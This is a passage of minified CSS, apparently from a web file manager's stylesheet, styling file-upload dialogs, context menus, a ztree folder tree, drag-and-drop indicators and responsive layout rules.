input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.pathinfo .download-url{margin-right:0;border-radius:3px 0 0 3px;}.file-drag-upload .aui-content{overflow-y:scroll;}.fileupload{padding-left:25px;}.fileupload span.status{padding-left:10px;font-size:10px;color:#f96;}.movie-player-dialog{overflow:hidden;}.flash-player{width:100%;height:100%;}.wmp-player{width:0%;height:0%;}.movie-player-dialog .aui-content{background:#000;}.dialog-path-remove .aui-content{word-wrap:break-word;width:auto;}.server-dwonload-textarea textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.server-dwonload-textarea textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.file-upload-box{height:385px;padding:5px;min-width:365px;overflow:hidden;}.file-upload-box .topbar-nav{border-bottom:1px solid #ddd;margin-top:6px;}.file-upload-box .menu{display:block;text-decoration:none;float:left;padding:0px 15px;height:26px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fff,#eee);background-image:-moz-linear-gradient(top,#fff,#eee);background-image:-o-linear-gradient(top,#fff,#eee);background-image:-ms-linear-gradient(top,#fff,#eee);background-image:linear-gradient(top,#fff,#eee);-pie-background:linear-gradient(to top,#fff,#eee);font-size:1em;border:1px solid #ccc;text-align:center;line-height:24px;margin-right:5px;margin-bottom:-1px;color:#444;border-radius:4px 4px 0 0;}.file-upload-box .menu.this{background:#fff;border-bottom:1px solid #fff;}.file-upload-box .menu:hover{background:#fff;}.file-upload-box .upload-box{margin-top:10px;}.file-upload-box .download-btn-group{margin-left:-10px;margin-top:-2px;margin-top:-4px \9;}.file-upload-box .download-btn-group .download-start{border-radius:0px;}.file-upload-box .upload-box-tips .btn.btn-default{border-radius:3px;color:#555;}.file-upload-box .upload-box-tips .btn-group>.btn:last-child:not(:first-child),.file-upload-box .upload-box-tips .btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0;}.file-upload-box div a.left{margin-left:10px;}.file-upload-box div a.right{position:absolute;right:5px;}.file-upload-box span.info{font-size:1em;font-style:italic;padding:0px 0 5px 10px;}.file-upload-box i{font-size:1em;color:#aaa;padding-left:10px;}.file-upload-box .list{margin:10px 15px 10px 0;}.file-upload-box .list input{margin-left:10px;width:190px;height:22px;line-height:24px;padding:0px 3px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.file-upload-box .list input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.file-upload-box .submit input{float:right;padding:4px 20px;background:#ddd;border:none;margin-right:36px;margin-top:10px;}.file-upload-box .submit input:hover{background:#bbb;}.file-upload-box .submit input:active{background:#444;color:#fff;}.file-upload-box .uploader-content{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;background:url("../../../images/common/drop_upload.png") no-repeat center;}.file-upload-box #downloader{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;}.file-upload-box .webuploader-container{position:relative;}.file-upload-box .webuploader-element-invisible{position:absolute !important;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);}.file-upload-box .webuploader-pick{position:relative;display:inline-block;color:#fff;text-align:center;height:27px;line-height:27px;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);cursor:pointer;padding:0px 15px;}.file-upload-box .webuploader-pick-hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .upload-cert{width:24px;background:#def;height:100%;float:left;cursor:pointer;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);height:27px;line-height:27px;position:relative;z-index:10;padding:0;border:none;margin-left:-5px;border-left:1px solid rgba(0,0,0,0.1);border-top-right-radius:3px;border-bottom-right-radius:3px;}.file-upload-box .upload-cert .caret{margin-top:-2px;margin-left:-1px;border-top:4px solid #fff;}.file-upload-box .upload-cert-box .dropdown-menu{right:inherit;top:inherit;margin-top:30px;}.file-upload-box .upload-cert-box .dropdown-menu:before{right:inherit;left:10px;}.file-upload-box .upload-cert-box .dropdown-menu:after{right:inherit;left:11px;}.file-upload-box .upload-cert-box.open.upload-cert,.file-upload-box .upload-cert-box .upload-cert:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .webuploader-pick-disable{opacity:0.6;filter:alpha(opacity=60);pointer-events:none;}.file-upload-box .btns{margin-bottom:10px;font-size:1em;height:28px;}.file-upload-box .btns .tips{float:right;line-height:30px;}.file-upload-box .btns #picker{float:left;}.file-upload-box .upload-box-tips{line-height:34px;color:#888;position:absolute;right:10px;}.file-upload-box .upload-box-config{box-shadow:inset 0px 1px 6px rgba(0,0,0,0.3);border-radius:2px;margin-bottom:10px;padding:4px;}.file-upload-box .upload-box-config .upload-check-box{margin-left:10px;}.file-upload-box .upload-box-config label{margin-left:15px;}.file-upload-box .upload-box-config label input{margin-right:5px;}.file-upload-box .uploader-list .item,.file-upload-box .download-list .item{padding:0px;height:35px;overflow:hidden;position:relative;border-bottom:1px solid #ccc;background:#fefefe;}.file-upload-box .uploader-list .item .info,.file-upload-box .download-list .item .info{color:#224;line-height:35px;padding:0 5px;z-index:100;position:relative;font-size:1em;}.file-upload-box .uploader-list .item .info span,.file-upload-box .uploader-list .item .info a,.file-upload-box .download-list .item .info span,.file-upload-box .download-list .item .info a{float:left;height:30px;display:block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}.file-upload-box .uploader-list .item .info .title,.file-upload-box .download-list .item .info .title{color:#3A87AD;width:160px;width:50%;font-weight:800;}.file-upload-box .uploader-list .item .info .size,.file-upload-box .download-list .item .info .size{width:45px;text-align:center;color:#3A87AD;font-size:12px;}.file-upload-box .uploader-list .item .info .state,.file-upload-box .download-list .item .info .state{width:100px;width:27%;text-align:right;font-size:12px;}.file-upload-box .uploader-list .item .info .font-icon,.file-upload-box .download-list .item .info .font-icon{margin-left:12px;font-size:20px;width:20px;line-height:35px;cursor:pointer;color:#bbb;}.file-upload-box .uploader-list .item .info .font-icon:hover,.file-upload-box .download-list .item .info .font-icon:hover{text-decoration:none;color:#f60;}.file-upload-box .uploader-list .item .info .icon-ok,.file-upload-box .download-list .item .info .icon-ok{color:#40AA53;}.file-upload-box .uploader-list .item .info .error,.file-upload-box .download-list .item .info .error{color:#f30;}.file-upload-box .uploader-list .item.success,.file-upload-box .download-list .item.success{background:#eaf8ff;}.file-upload-box .uploader-list .item.error,.file-upload-box .download-list .item.error{background:#ffe8e6;}.file-upload-box .uploader-list .item .progress,.file-upload-box .download-list .item .progress{height:38px;margin:0px;width:100%;border-radius:0;box-shadow:none;position:absolute;top:0;}.file-upload-box .uploader-list .item .progress-bar,.file-upload-box .download-list .item .progress-bar{background-color:#adf;background-image:linear-gradient(45deg,rgba(255,255,255,0.35) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.35) 50%,rgba(255,255,255,0.35) 75%,transparent 75%,transparent);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ddeeff',endColorstr='#88ccff',GradientType=1);BACKGROUND-REPEAT:repeat-x;}.file-upload-box .uploader-list .success:hover,.file-upload-box .download-list .success:hover{cursor:pointer;background:#def;border-bottom:1px solid #3A87AD;}@media screen and (-ms-high-contrast:active),(-ms-high-contrast:none){.btn{ padding:5px 14px;} input[type='checkbox'].kui-checkbox-ios.size-big + em{ height:27px;} #body .system-content .right-frame .user-list table tr td.select input{ position:relative;top:4px;} #body table tr input[type='text']{ line-height:22px;} .do-search-box .search-header .btn-right{ margin:-9px 0 0 -2px;height:23px;} .appbox .appline.icon .open{ margin-top:-2px;} .appbox .appline label{ position:relative;top:-4px;} #body .main .group-editor .tag input{ position:relative;top:-5px;} .share-dialog .aui-border{ overflow:auto;} .share-dialog .content-box .content-info .input-line.select-path a.select-btn{ padding:3px 8px 4px;} .kui-radio + span, .kui-checkbox + span{ position:relative;top:-6px;} .kui-radio.size-small + span, .kui-checkbox.size-small + span{ position:relative;top:-4px;} .kui-radio.size-smallx + span, .kui-checkbox.size-smallx + span{ position:relative;top:-2px;}}@media (max-width:743px){html #body .app-menu-left, html body .app-menu-left{ width:50px;min-width:50px;} html #body .app-menu-left .search{ opacity:0.001;} html #body .menu-left .setting a.selected, html body .menu-left .setting a.selected{ padding-left:0px;margin-left:-5px;} html #body .main.app-content, html body .main.app-content{ left:50px;} html #body .main.app-content .app-list, html body .main.app-content .app-list{ justify-content:space-around;} html .form-box .form-row .setting-title{ text-align:left;} html .form-box .form-row.form-userSelect .setting-content{ padding:10px 5%;} html .form-box .form-row .setting-content{ width:90%;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{ width:100%;height:40px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{ left:0px;top:80px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{ float:left;} html #body.plugin-page .app-menu-left .line, html body.plugin-page .app-menu-left .line{ padding:4px 0;} html body #body .menu-left, html body #body .app-menu-left{ width:50px;min-width:50px;} html body #body .menu-left h1, html body #body .app-menu-left h1{ font-size:14px;font-weight:800 !important;padding:10px 0px 10px 0px;text-align:center;} html body #body .menu-left .font-icon, html body #body .app-menu-left .font-icon{ padding-right:30px;} html #body .setting-tools-right, html body .setting-tools-right{ top:0;} html #body .main .nav a, html body .main .nav a{ padding:5px 10px;} html #body .main .nav, html body .main .nav{ margin-right:0px;} html #body .setting-tab, html body .setting-tab, html #body .system-content, html body .system-content{ margin-right:10px;} html #body .main, html body .main{ left:50px;width:auto;margin-right:10px;} html .form-box .form-row .desc, html .form-box .form-row .setting-content i{ display:block;} html #body .setting-tab .form-row, html body .setting-tab .form-row, html #body .system-content .form-row, html body .system-content .form-row{ background:#fafafa;border-radius:4px;padding:0 5px;} html .form-box .form-row .setting-title{ height:20px;line-height:20px;} html .form-box .form-row{ padding:0;} html .form-box .form-row input[type='text'], html .form-box .form-row input[type='password'], html .form-box .form-row input[type='number']{ width:180px;} html .form-box .form-row #wallpage-url{ width:150px !important;} html #body .main .section .content .box p, html body .main .section .content .box p{ text-indent:10px;} html #body .system-content.setting-member{ width:800px;} html body.setting-page .select-user-group .right-content, html body.setting-page .select-user-group .left-content{ width:170px;} html .topbar .content .top-right ul.dropdown-menu.topbar-language{ width:235px;max-height:800px;} html #body .main .section .box, html body .main .section .box{ margin-right:10px;} html #body .main .section .box .list, html body .main .section .box .list{ width:95px;height:95px;} html #body .main .section .box .list .ico, html body .main .section .box .list .ico{ width:75px;height:60px;} html #body .panel, html body .panel{ margin-right:0px;} html #body .main.app-content .app-list .app-li, html body .main.app-content .app-list .app-li{ margin:0 5px 20px 0;width:130px;} html #body .main.app-content .app-model, html body .main.app-content .app-model{ padding:10px;}}@-webkit-keyframes fadein{0%{ opacity:0;} 50%{ opacity:0.4;}}.playmusic-icon{display:none;}.context-menu-list{margin:0;margin-left:4px;min-width:190px;max-width:300px;font-size:1em;display:inline-block;position:absolute;list-style-type:none;padding:8px 0px;border:none;border:1px solid #ccc \9;border-radius:4px;background:#fff;-webkit-box-shadow:0 10px 80px rgba(0,0,0,0.4);-moz-box-shadow:0 10px 80px rgba(0,0,0,0.4);box-shadow:0 10px 80px rgba(0,0,0,0.4);}.context-menu-list span b{display:inline-block;font-size:1em;font-weight:200;color:#aaa;padding-left:10px;min-width:50px;text-align:right;overflow:hidden;position:absolute;right:10px;width:65px;}.context-menu-list .hover>span>b{color:#fff;}.context-menu-list.menu-auto-fit{top:5px !important;}.context-menu-list li.selected{border-left:none !important;background:none;}.context-menu-list li.selected i.font-icon{color:#aaa;font-family:FontAwesome;font-weight:normal;font-style:normal;}.context-menu-list li.selected i.font-icon:before{content:"\f00c" !important;}.context-menu-list .context-menu-submenu:after{content:"\f0da";font-family:FontAwesome;display:inline-block;float:right;margin-right:0px;right:10px;position:absolute;}.context-menu-list .context-menu-item{display:block;cursor:pointer;white-space:nowrap;clear:both;line-height:25px;height:23px;position:relative;border:none;padding:0px 20px 0 15px;color:#222;-webkit-transition:background-color .1s;-moz-transition:background-color .1s;-o-transition:background-color .1s;-ms-transition:background-color .1s;transition:background-color .1s;}.context-menu-list .context-menu-item .font-icon{display:inline-block;width:16px;text-align:center;font-size:1.2em;color:#aaa;margin-right:15px;vertical-align:middle;margin-top:-2px;padding:0;}.context-menu-list .context-menu-item.disabled,.context-menu-list .context-menu-item.disable{cursor:not-allowed;pointer-events:auto;color:#ccc;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{color:#ddd;}.context-menu-list .context-menu-item.disabled.hover,.context-menu-list .context-menu-item.disable.hover{color:#ccc;cursor:default;background-color:#fff;}.context-menu-list .context-menu-item.disabled.hover .font-icon,.context-menu-list .context-menu-item.disable.hover .font-icon{color:#ddd;}.context-menu-list .context-menu-item.hover{cursor:pointer;color:#fff;background:#63acff;background-color:none \9;}.context-menu-list .context-menu-item.hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item span i{float:right;text-align:right;font-style:normal;color:#888;}.context-menu-list .context-menu-item.context-menu-separator{height:2px;line-height:0;border-bottom:1px solid #eee;margin:2px 0 4px;}.context-menu-list .context-menu-item > .context-menu-list{display:none;right:-5px;top:5px;}.context-menu-list .context-menu-item.hover > .context-menu-list{display:block;}.context-menu-list .context-menu-item.hover > .context-menu-list .font-icon{color:#aaa;}.context-menu-list .context-menu-item.hover > .context-menu-list .hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item .context-menu-accesskey{text-decoration:underline;}.context-menu-list .context-menu-item .line-top{border-top:1px solid #ddd !important;}.font-icon.icon-home,.x-tree-self{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;filter:none;-ms-filter:none;}.font-icon.icon-home:before,.x-tree-self:before{content:"" !important;}.font-icon.icon-circle-arrow-up{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.font-icon.icon-circle-arrow-up:before{content:"" !important;}.x-tree-fav.small{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.x-tree-fav.small:before{content:"" !important;}.frame-right #search .font-icon.icon-search{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -736px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;margin-top:4px;}.frame-right #search .font-icon.icon-search:before{content:"" !important;}.context-menu-list .font-icon:before{color:#249dff;background-image:-webkit-linear-gradient(2deg,#249dff,#08558a);background-clip:text;text-fill-color:transparent;-webkit-text-fill-color:transparent;-webkit-background-clip:text;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{opacity:0.3;filter:alpha(opacity=30);}.context-menu-list .context-menu-item.search .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 0px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.search .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open .font-icon,.context-menu-list .context-menu-item.open-the-path .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open .font-icon:before,.context-menu-list .context-menu-item.open-the-path .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.upload .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.upload .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.down .font-icon,.context-menu-list .context-menu-item.download .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.down .font-icon:before,.context-menu-list .context-menu-item.download .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.cute .font-icon,.context-menu-list .context-menu-item.cute-to .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.cute .font-icon:before,.context-menu-list .context-menu-item.cute-to .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.copy .font-icon,.context-menu-list .context-menu-item.copy-to .font-icon,.context-menu-list .context-menu-item.copy-see .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -96px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.copy .font-icon:before,.context-menu-list .context-menu-item.copy-to .font-icon:before,.context-menu-list .context-menu-item.copy-see .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt:before{content:"" !important;}.context-menu-list .context-menu-item.newfile .icon-expand-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfile .icon-expand-alt:before{content:"" !important;}.context-menu-list .context-menu-item.rname .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.rname .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.past .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.past .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.remove .font-icon,.context-menu-list .context-menu-item.fav-remove .font-icon,.context-menu-list .context-menu-item .close .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.remove .font-icon:before,.context-menu-list .context-menu-item.fav-remove .font-icon:before,.context-menu-list .context-menu-item .close .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.zip .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.zip .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt:before{content:"" !important;}.context-menu-list .context-menu-item.share .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-15px -703px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.share .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open-text .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -702px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open-text .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.setBackground .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -609px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.setBackground .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.fav .font-icon,.context-menu-list .context-menu-item.fav-page .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.fav .font-icon:before,.context-menu-list .context-menu-item.fav-page .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0px -577px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture:before,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture:before{content:"" !important;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -528px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort:before{content:"" !important;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -625px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-code-fork{display:inline-block;background-image:url("../../../images/file_icon/icon_app/history.png");width:16px !important;background-repeat:no-repeat;background-size:100% 100%;}.context-menu-list .context-menu-item .font-icon.icon-code-fork:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-info{color:#fff !important;background:#c4e5ff;text-align:center;width:15px;border-radius:50%;height:15px;line-height:15px;margin-right:15px;box-shadow:0 0 0 1px #6db9f5;}.ztree{margin:0px;padding:10px 0px;font-size:1em;}.ztree li{padding:0;margin:0;list-style:none;text-align:left;white-space:nowrap;outline:0;}.ztree li ul{margin:0;padding:0;}.ztree li.level0{margin-bottom:4px;}.ztree li.level0>span.tree_icon{width:20px;}.ztree li span{line-height:24px;}.ztree li span.button{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:24px;width:20px;margin-right:5px;}.ztree li span.button.switch{width:25px;height:25px;margin-right:0px;background:none;text-align:center;line-height:25px;}.ztree li span.button.switch:hover{background:rgba(0,0,0,0.03);}.ztree li span.button.switch:after{content:"\f0da";font-family:FontAwesome;color:#aaa;text-decoration:inherit;font-size:1.25em;line-height:16px;padding-left:6px;-webkit-font-smoothing:antialiased;}.ztree li span.button.switch.noline_docu:after{content:' ';}.ztree li span.button.switch.noline_open:after,.ztree li span.button.switch.noline_open_hover:after{content:"\f0d7";}.ztree li span.button.switch.switch_hover:after{color:#63acff;}.ztree li span.button.ico_loading{background:url("../../../images/common/loading_tree.gif") no-repeat 0 0px transparent !important;}.ztree li span.button.ico_loading .x-item-file{display:none;}.ztree li span.tree_icon{height:21px;width:21px;background:none;overflow:hidden;}.ztree li span.tree_icon img{width:100%;max-width:100%;max-height:100%;}.ztree li a{padding-top:0px;cursor:pointer;text-decoration:none;display:block;margin:0;color:#333;vertical-align:top;line-height:24px;height:24px;padding-left:10px;border:1px solid #fff;position:relative;}.ztree li a:hover{text-decoration:none;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;background:#eee;height:24px;border:1px solid #eee;}.ztree li a.curSelectedNode,.ztree li a.curDropTreeNode{border:1px solid #63acff;background:#63acff;line-height:24px;height:24px;color:#fff;}.ztree li a.curSelectedNode .button.switch:after,.ztree li a.curDropTreeNode .button.switch:after{color:#fff !important;}.ztree li a.curDropTreeNode{box-shadow:0 0 0 1px #fff inset !important;}.ztree li a.curSelectedNode_Edit{border:1px solid #63acff;background:#63acff;color:black;height:24px;}.ztree li a input.rename{height:25px;line-height:24px;padding:0;margin:0;border:none;outline:none;margin-left:-3px;padding-left:3px;width:106px;position:absolute;margin-top:-1px;}.ztree li a span.button.root_docu,.ztree li a span.button.noline_docu{background:none;}.ztree li a .menu-item{display:none;position:absolute;right:4px;top:4px;width:14px;height:13px;box-sizing:content-box;text-align:center;border:1px solid #ccc;background:#fff;border-radius:2px;cursor:pointer;z-index:50;}.ztree li a .menu-item:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.ztree li a .menu-item:hover .cert{border-top-color:#3399ff;}.ztree li a .menu-item .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.ztree li a:hover .menu-item,.ztree li a.curSelectedNode .menu-item{display:block;}ul.ztree.zTreeDragUL{margin:0;padding:0;position:absolute;width:auto;height:auto;background-color:#63acff;border:1px solid #63acff;opacity:0.5;filter:alpha(opacity=50);}ul.ztree.zTreeDragUL li a span.space{display:none !important;}ul.ztree.zTreeDragUL li a{padding:4px 10px 0 10px;color:#fff;}ul.ztree.zTreeDragUL li span.button.switch{display:none;}.ztree li a.tmpTargetNode_inner{background:#0076fc;border:1px solid #3091ff;color:#fff;}.ztree li a.tmpTargetNode_prev{border-bottom:1px solid #f96;}.ztree li a.tmpTargetNode_next{border-bottom:1px solid #f96;}span.tmpzTreeMove_arrow{display:inline-block;margin:4px 0 0 2px;position:absolute;border-color:transparent transparent transparent #fff;border-style:solid;border-width:7px 0px 7px 7px;width:0;height:0;_border-top-color:white;_border-bottom-color:white;_filter:chroma(color=white);}.frame-left .ztree li .file{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:22px;width:18px;margin-right:5px;}.select-container{position:absolute;cursor:default;width:0px;height:0px;border:1px solid #005ec9;background-color:#63acff;z-index:1000;opacity:0.5;filter:alpha(opacity=50);}.select-container:hover{cursor:default;}.file-draging{position:absolute;left:0;top:0px;z-index:1000;pointer-events:none;opacity:0.95;}.file-draging.file-list-icon,.file-draging.file-list-list,.file-draging.file-list-split{z-index:1000;overflow:visible;}.file-draging.file-list-icon div.file,.file-draging.file-list-list div.file,.file-draging.file-list-split div.file{clear:both;position:absolute;margin:0;transition:none !important;}.file-draging.file-list-icon div.file.handle_target,.file-draging.file-list-list div.file.handle_target,.file-draging.file-list-split div.file.handle_target{z-index:999;}.draggable-dragging{z-index:9999;clear:both !important;pointer-events:none;position:absolute !important;padding:5px;opacity:0.9;filter:alpha(opacity=90);background:#4285f4;border-radius:4px;color:#fff;box-shadow:3px 5px 15px rgba(0,0,0,0.2);font-size:1.15em;}.draggable-dragging .drag-number{display:none;}.draggable-dragging span{line-height:25px;padding-left:5px;padding-right:15px;}.draggable-dragging span .font-icon{display:inline-block;width:22px;height:22px;text-align:center;line-height:22px;color:#fff;font-size:1.0em;font-weight:800;margin-right:10px;border-radius:12px;}.draggable-dragging span .bg-default{background:#b9e0ff;color:#4285f4;}.draggable-dragging span .bg-ok{background:#6ee273;}.draggable-dragging span .bg-error{background:#FB2500;}.draggable-dragging span b{padding-right:15px;}.item-file-draging{opacity:0.5;filter:alpha(opacity=50);}.selectDragDraging 